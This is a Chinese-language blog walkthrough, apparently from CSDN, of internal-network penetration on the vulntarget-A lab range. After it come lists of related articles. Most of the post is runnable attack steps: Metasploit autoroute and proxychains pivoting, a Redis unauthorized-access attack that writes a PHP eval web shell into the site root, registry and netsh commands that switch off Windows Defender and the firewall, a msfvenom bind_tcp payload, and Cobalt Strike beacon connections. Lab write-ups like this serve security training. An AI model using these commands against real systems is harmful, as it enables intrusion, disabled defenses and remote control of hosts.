内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)
内网安全:内网渗透.(拿到内网主机最高权限)
内网穿透又被称为NAT穿透,内网端口映射外网,在处于使用了NAT设备的私有TCP/IP网络中的主机之间建立连接的问题。通过映射端口,让外网的电脑找到处于内网的电脑。端口映射,就是NAT地址转换的一种,功能就是把在公网的地址转翻译成私有地址。在局域网内部的任一PC或服务器上运行到内网穿透客户端,此时域名解析到的IP地址是局域网网关出口处的公网IP地址,再在网关处做端口映射指向监控设备即可.
目录:
内网安全:内网渗透.(拿到内网主机最高权限)
网络环境所示:
主机信息:
内网渗透 测试:
(1)内网主机探测:
(2)构建通道:
(3)内网扫描:
(4)内网渗透:
(5)上线 MSF :
(6)上线 CS :
免责声明:
严禁利用本文章中所提到的虚拟机和技术进行任何形式的攻击,否则后果自负,上传者不承担任何责任。
网络环境所示:
主机信息:
主机 |
外网 |
内网1 | 内网2 |
kali | 192.168.0.101 | ||
win 7 | 192.168.0.102 | 10.0.20.98 | |
win 2016 | 10.0.20.99 | 10.0.10.111 | |
win 2019 | 10.0.10.110 |
前面的 Web服务器 渗透:Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)_半个西瓜.的博客-CSDN博客
内网渗透 测试:
(1)内网主机探测:
shell ipconfig //查看 网卡的 网段信息.
主机探测和端口探测.
发现一台内网主机,IP为 10.0.20.99
(2)构建通道:
代理转发.【msf 代理】run post/multi/manage/autoroute // 添加路由run autoroute -p // 查看路由
代理转发.【CS 代理】
查看代理信息.
修改配置 /etc/proxychains4.conf 文件vim /etc/proxychains4.conf //打开这个文件.
(3)内网扫描:
浏览器配置代理:
进行访问 第二层内网主机的 6379 端口( Redis 服务 )proxychains4 redis-cli -h 10.0.20.99proxychains4 redis-cli -h 【第二层内网 主机 IP 地址】
(4)内网渗透:
利用 Redis 未授权漏洞.
由于 10.0.20.99 这台机器开启了Web服务,我们要通过 Resis 未授权漏洞写入webshell,于是我们
需要知道网站的绝对路径,并且需要具有读写权限。方法一:
我们也可以简单探测,有没有可能暴露敏感信息的文件
比如:/phpinfo.php 这些文件.(这个过程可以使用目录扫描等等方法.)
(Resis 未授权漏洞 默认路径: C:\phpStudy\PHPTutorial\www\)方法二:
如果不是这个默认路径,则修改为路径: Redis写启动项(需要猜路径 猜用户名),定时自动执行bat脚本
上线或者反弹shell
因此我们写入 wenshell (一句话木马)
(1)proxychains4 redis-cli -h 10.0.20.99 //连接 Redis 服务.(2)config set dir "C:/phpStudy/PHPTutorial/www/"
//在网站的根目录下写进去一个脚本.(C:/phpStudy/PHPTutorial/www/ 是 win 默认路径)(3)config set dbfilename bgxg.php //脚本名称为 bgxg.php(4)set 1 "<?php @eval($_POST['bgxg']);?>" // 脚本内容(一句话木马)(5)save // 保存 刚刚写入的信息.
上传木马程序,需要关闭 Windows Denfder REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /fgpupdate /force
上传木马程序,需要关闭防火墙.(1)Netsh advfirewall show allprofiles // 查看防火墙配置(2)netSh advfirewall set allprofiles state off // 关闭防火墙
(5)上线 MSF :
渗透 第二层 内网.[msf 代理]
run post/multi/manage/autoroute // 添加路由run autoroute -p // 查看路由background // 挂起 会话
重新再生成一个新的程序(木马)【用来渗透第二层内网.】msfvenom -p windows/meterpreter/bind_tcp LHOST=192.168.0.101 LPORT=12345 -f exe > 12345.exe
set payload windows/meterpreter/bind_tcp // 设置 payload set lport 12345 // 设置 和程序(木马)的端口set rhost 10.0.20.99 // 设置 第二层内网的目标主机.run // 进行 测试.
利用 蚁剑 进行上传 程序(木马)到第二层主机中 并执行.
(6)上线 CS :
建立 Beacon TCP 监听器:
生成一个新程序木马.(要来渗透第二层内网的其他主机)
利用 蚁剑 进行上传 程序(木马)
connect 10.0.20.99 666connect 第二层内网主机 IP 地址 木马的端口
内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)相关推荐
- 内网渗透测试:内网信息收集与上传下载
在之前的几节中,我们讲了隐藏通讯隧道技术的运用,那其实都是渗透测试的后话,接下来要讲的信息收集才是内网渗透的基础. 可以说内网渗透测试,其本质就是信息收集.信息收集的深度,直接关系到内网渗透测试的成败 ...
- 内网安全(四)---横向渗透:PTHPTKPTT
域横向 PTH&PTK&PTT 哈希票据传递 1.知识: PTH(pass the hash) : 利用 lm 或 ntlm 的值. PTT(pass the ticket): 利用的 ...
- 内网渗透测试:内网横向移动基础总结
内网渗透测试:内网横向移动基础总结 横向移动 在内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围.通过此类手段 ...
- 《内网安全攻防:渗透测试实战指南》读书笔记(八):权限维持分析及防御
目录 前言 一.操作系统后门 1.粘滞键后门 2.注册表注入后门 3.计划任务后门 4.meterpreter后门 5.Cymothoa后门 6.WMI后门 二.WEB后门 1.Nishang下的We ...
- 《内网安全攻防:渗透测试实战指南》读书笔记(二):内网信息收集
目录 前言 一.收集本机信息 1.手动搜集 (1)查询网络配置 (2)查询操作系统及软件的信息 (3)查询本机服务信息 (4)查询进程列表 (5)查看启动程序信息 (6)查看计划任务 (7)查看主机开 ...
- 内网渗透系列:内网隧道之ICMP隧道
目录 前言 一.ICMP隧道技术 1.ICMP协议 (1)报文格式 (2)ping 2.ICMP隧道 (1)原理 (2)优缺点 二.ICMP隧道工具 1.icmpsh (1)源码 (2)用法 2.ic ...
- 内网渗透系列:内网信息搜集方法小结2
目录 前言 一.本机信息搜集 1.用户列表 (1)windows用户列表 (2)分析邮件用户 2.进程列表 3.服务列表 4.端口列表 5.补丁列表 6.本机共享 7.本用户习惯分析 8.获取当前用户 ...
- 《内网安全攻防:渗透测试实战指南》读书笔记(四):权限提升分析及防御
目录 前言 一.系统内核溢出漏洞提权分析及防范 1.通过手动执行命令发现缺失补丁 (1)MS16-032(KB3139914) 2.利用MSF发现缺失补丁 3.Windows Exploit Sugg ...
- 《内网安全攻防:渗透测试实战指南》读书笔记(一):内网渗透测试基础
目录 前言 一.内网基础知识 1.工作组 2.域 3.活动目录 (1)活动目录的功能 (2)DC和AD区别 4.安全域的划分 (1)DMZ (2)内网 5.域中计算机的分类 6.域内权限 (1)组 ( ...
最新文章
- python 文件格式转换_Python的处理数据,如何进行数据转换,学会三种方式
- Paper:《NÜWA: Visual Synthesis Pre-training for Neural visUal World creAtion,女娲:用于神经视觉世界创造的视觉》翻译与解读
- Python教程:快速掌握列表的常用方法
- ios::sync_with_stdio();
- 【PAT甲级 排序】1036 Boys vs Girls (25 分) C++
- java nosql_Java EE的NoSQL的未来
- Vite2.0搭建Vue3移动端项目
- 再见2019,拥抱2020
- Oracle导入导出之dmp
- 【ANSYS命令流】模型的建立(二):其他相关命令(图形控制、节点单元选择等)
- Python源码阅读(一)
- uv纹理坐标设定与贴图规则
- Redux Reducer 的拆分
- Java编程思想-并发(5)
- java jsp使用flash播放mp4,(jsp/html)网页上嵌入播放器(常用播放器代码整理)
- Android中的传感器之---光线传感器
- Jquery鼠标点击后变色,点击另一个按钮颜色还原
- 安卓Android基于百度云平台人脸识别学生考勤签到系统设计
- 潜心Build!Web3.0行业近期高融资项目有哪些?
- 如何在cmd命令行下切换目录(详细步骤)
热门文章
- license生成方案
- 用c语言编写:将两个字符串连接起来,不使用stract()函数
- 【树莓派】树莓派开放WiFi热点
- 极点五笔for linux
- GIS文件 | EXCEL中打开ShapeFile等GIS文件
- 【对讲机的那点事】你了解对讲机IP互联中继台系统实现的原理及网络模型吗?...
- android录视频花屏,拍大师录制视频花屏怎么办 拍大师录制视频花屏的解决方法...
- mega-nerf安装流程
- 一位IT从业人员的心路历程
- D. Puzzles [排列组合]